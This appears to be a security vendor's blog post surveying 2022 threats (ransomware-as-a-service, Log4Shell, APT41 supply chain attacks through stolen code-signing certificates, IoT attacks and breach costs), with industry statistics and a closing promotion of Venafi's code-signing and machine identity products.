Cybersecurity threats are only increasing as the digital transformation continues. While Log4J is the latest serious vulnerability—prompting the FTC to threaten legal action if organizations don’t act to mitigate the problem—ransomware looms as a persistent risk in 2022 as criminals shift to a Ransomware-as-a-service (RaaS) business model. Other threats on a growth path include software supply chain and IoT attacks.
Colonial Pipeline, Kaseya, and JBS are the stand-out examples of ransomware attacks in 2021 but the threat is everywhere now. Ransomware attacks spiked by 250% from Q1 to Q2 of 2021, Venafi said in its Global Security Report.
“By the end of 2021, it’s estimated that an organization will be hit by ransomware every 11 seconds,” according to a Venafi-sponsored study conducted by Sapio Research, which evaluated data from 1,506 IT security officers across the U.S., U.K., Germany, France, Benelux and Australia.
This is being driven by the Ransomware as-a-Service (RaaS) Economy, as noted by Check Point Software. “In the RaaS economy, the service provided is the infrastructure required to perform a ransomware attack. RaaS operators maintain the ransomware malware, offer a payment portal for victims, and may provide the ‘customer service’ that victims might need (since many ransoms are demanded in Bitcoin or other cryptocurrencies).”
Affiliates are responsible for spreading the ransomware and any ransom paid is split between the operator and the affiliate, according to Check Point.
Like any business, both ends of the business model benefit. The operator gains scale and can focus on maintaining the backend infrastructure, while the affiliate gets access to the ransomware and infrastructure and can focus on infiltrating networks and infecting computers, says Check Point.
In 2020 the total amount of ransom paid by cyberattack victims was close to $416 million. This figure is projected to double in 2021 and double again in 2022. And the total average cost to rectify ransomware attacks is estimated to be US$1.85 million, more than double the US $761,106 cost reported in 2020, according to Sophos.
But there are ways to fight back.
“Controls like code signing, restricting the execution of malicious macros and limiting the use of unsigned scripts based on corporate security policies use a high level of automation to prevent ransomware in our machine-centric, digitally transformed world,” explains Kevin Bocek, vice president ecosystem and threat intelligence at Venafi.
Apache Log4Shell is a zero-day Remote Code Execution (RCE) vulnerability (CVE-2021-44228) in Log4j – a popular Java library for logging in Java applications – first reported to Apache in November of 2021. It allows a remote attacker to execute arbitrary code, as explained by Yana Blachman, Threat Intelligence researcher at Venafi.
“The combination of this library being practically everywhere and the vulnerability being trivial to exploit with many exploits and PoCs [proof of concept] available online—makes it extremely dangerous and highly effective for every type of cybercriminal activity,” Blachman said, adding that the widespread exploitation of the vulnerability means every corporate network is at risk.
Log4J will continue to be a concern for cybersecurity professionals in 2022 as the Federal Trade Commission (FTC) puts pressure on organizations to take action.
Venafi recommends companies use the Log4Shell scanner [log4shell.huntress.com] to assess if they are vulnerable and patch the vulnerability as soon as possible before becoming a victim, according to Blachman.
Supply chain attacks are way up in the last 12 months, according to software supply chain management company Sonatype, which cites an increase of 650% in attacks over that time period.
Software supply chain attackers target code in the software that vendors supply to their customers. This is becoming popular with criminals because the attacks can be concealed from the end user. Then hackers can leverage exploits to launch attacks.
APT41 – a state-backed Chinese hacking group – is one of the most notorious supply chain attackers. APT41’s most common attack methodology is to penetrate the supply chain via compromised code signing certificates, as Venafi has noted.
This allows “malicious code to appear authentic and evade security controls. The success of attacks using this model over the last decade has created a blueprint for sophisticated attacks that have been highly successful because they are very difficult to detect,” according to Venafi’s Blachman.
One typical APT41 tactic is to compromise the supply chain of a major commercial vendor, which gives them access to an entire pool of companies—which the bad guys can then attack at their leisure, Blachman says. After infecting their chosen targets with secondary malware, APT41 uses stolen credentials to move laterally across their networks, stealing intellectual property, sensitive customer data, and more.
At the heart of this scheme are stolen code signing machine identities, without which gaining unauthorized network access would be impossible.
APT41 is managing a library of stolen or purchased code signing keys and certificates and selling them for up to $1,200 each on the dark web.
Venafi's Kevin Bocek notes that today’s attackers are “disciplined, highly skilled software developers, using the same tools and techniques as the good guys.”
“Few cybersecurity specialists keep track of their corporate IoT [Internet of Things] hardware,” says cybersecurity company Kaspersky. “More often than not, smart elevators, all sorts of sensors, IPTV, printers, surveillance cameras, and the like are just a motley collection of disparate devices, each with its own OS and proprietary protocols, and many lacking any sort of proper control interface … you get the picture. Your company may have thousands of them,” according to Kaspersky.
Throw in all of the new consumer devices such as smartwatches and home appliances and it’s easy to see how these devices are becoming ubiquitous.
Kaspersky, which set up honeypots—described as "traps" for online attackers—said these honeypots detected over 1.5 billion cyberattacks focused on IoT devices in the first half of 2021, a report at TechRepublic said.
This will only get worse in 2022. “In 2022 we will undoubtedly continue to see attacks on IoT devices increase. Edge computing devices—where data is operated on as close as possible to the point it is collected—as well as centralized cloud infrastructure is all vulnerable,” according to Forbes.
Data breach costs rose from US $3.86 million to US $4.24 million “the highest average total cost in the 17-year history of this report,” said IBM in its Cost of a Data Breach Report 2021 (via welivesecurity).
On the upside, the average cost of a breach was US $1.76 million less at organizations with a mature zero trust approach, compared to organizations without zero trust, IBM said.
Zero Trust security is based on the tenet “Never Trust, Always Verify” and requires strict, and continuous verification of user and machine identities, as Venafi has described. In a business environment where applications are delivered from the cloud to the cloud, users are located everywhere and use multiple machines to accomplish routine tasks. That means that all interactions—even those originating from employees—are inherently risky and necessitate a different approach to security. Zero Trust is a strategic initiative and principle that helps organizations prevent data breaches and protect their assets by assuming no entity is trusted.
Venafi CodeSign Protect is an all-in-one machine identity management solution for your code signing keys and certificates. Insecure private keys, rogue software teams, and lack of policy enforcement can be mitigated as you kickstart your digital transformation. Information is power, and an in-depth understanding of the latest code signing compromise techniques could be what saves your network from a financially devastating cyber-attack. To support IoT and Zero Trust security models, explore the enterprisewide machine identity management provided by Venafi Trust Protection Platform.